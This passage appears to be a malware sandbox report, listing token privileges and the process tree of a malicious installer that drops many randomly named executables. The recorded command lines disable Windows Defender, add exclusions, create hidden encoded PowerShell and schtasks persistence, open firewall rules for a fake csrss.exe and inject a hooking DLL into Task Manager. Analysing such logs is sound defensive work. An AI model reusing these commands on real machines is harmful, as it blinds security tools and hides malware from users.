| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe
"C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe"
C:\Users\Admin\Documents\GuardFox\LCpil3pW_l7ri4gXpRd7f0AQ.exe
"C:\Users\Admin\Documents\GuardFox\LCpil3pW_l7ri4gXpRd7f0AQ.exe"
C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe
"C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe"
C:\Users\Admin\Documents\GuardFox\w6rxdZKVGKZ4S99sMhSfXG4z.exe
"C:\Users\Admin\Documents\GuardFox\w6rxdZKVGKZ4S99sMhSfXG4z.exe"
C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe
"C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe"
C:\Users\Admin\Documents\GuardFox\FTX9TSuWx9FxH3XuanhJX4zO.exe
"C:\Users\Admin\Documents\GuardFox\FTX9TSuWx9FxH3XuanhJX4zO.exe"
C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe
"C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe" -i
C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe
"C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe" -s
C:\Users\Admin\AppData\Local\Temp\7zS2229.tmp\Install.exe
.\Install.exe /iFFhdidlQI "525403" /S
C:\Users\Admin\AppData\Local\Temp\7zS11BE.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Documents\GuardFox\jfuVd2Wxxnz6tzydAf9H8i_Y.exe
"C:\Users\Admin\Documents\GuardFox\jfuVd2Wxxnz6tzydAf9H8i_Y.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5260 -s 340
C:\Users\Admin\Documents\GuardFox\SBv9uOfXRyyWp_0lKyUFY2zJ.exe
"C:\Users\Admin\Documents\GuardFox\SBv9uOfXRyyWp_0lKyUFY2zJ.exe"
C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe
"C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe"
C:\Users\Admin\AppData\Local\Temp\is-S0TH8.tmp\evl5AhAqx92wdfRi532WmaQN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S0TH8.tmp\evl5AhAqx92wdfRi532WmaQN.tmp" /SL5="$130200,4078676,54272,C:\Users\Admin\Documents\GuardFox\evl5AhAqx92wdfRi532WmaQN.exe"
C:\Users\Admin\Documents\GuardFox\LghhhG5dYtl5hoIKD95UlVUg.exe
"C:\Users\Admin\Documents\GuardFox\LghhhG5dYtl5hoIKD95UlVUg.exe"
C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe
"C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5260 -ip 5260
C:\Users\Admin\Documents\GuardFox\vGrIU7ib1YOS2PYSmzDAoF5v.exe
"C:\Users\Admin\Documents\GuardFox\vGrIU7ib1YOS2PYSmzDAoF5v.exe"
C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe
"C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe"
C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe
"C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe"
C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe
"C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe"
C:\Users\Admin\Documents\GuardFox\evl5AhAqx92wdfRi532WmaQN.exe
"C:\Users\Admin\Documents\GuardFox\evl5AhAqx92wdfRi532WmaQN.exe"
C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe
"C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe"
C:\Users\Admin\Documents\GuardFox\e1lkxrydipIJfmBIkHJEKZuB.exe
"C:\Users\Admin\Documents\GuardFox\e1lkxrydipIJfmBIkHJEKZuB.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\60fd73a9-b566-4ebe-bf13-7efa1ba8c839" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe
"C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe
"C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5204 -ip 5204
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 568
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8b4cb9758,0x7ff8b4cb9768,0x7ff8b4cb9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXZzXSySt" /SC once /ST 10:21:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gXZzXSySt"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1952 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1740 -ip 1740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 2228
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe
"C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe"
C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe
"C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 956 -ip 956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 2164
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gXZzXSySt"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "beMXFFiCiqlBKkvOrW" /SC once /ST 11:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\hRDMMfa.exe\" Fm /zesite_idOIT 525403 /S" /V1 /F
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\hRDMMfa.exe
C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\hRDMMfa.exe Fm /zesite_idOIT 525403 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
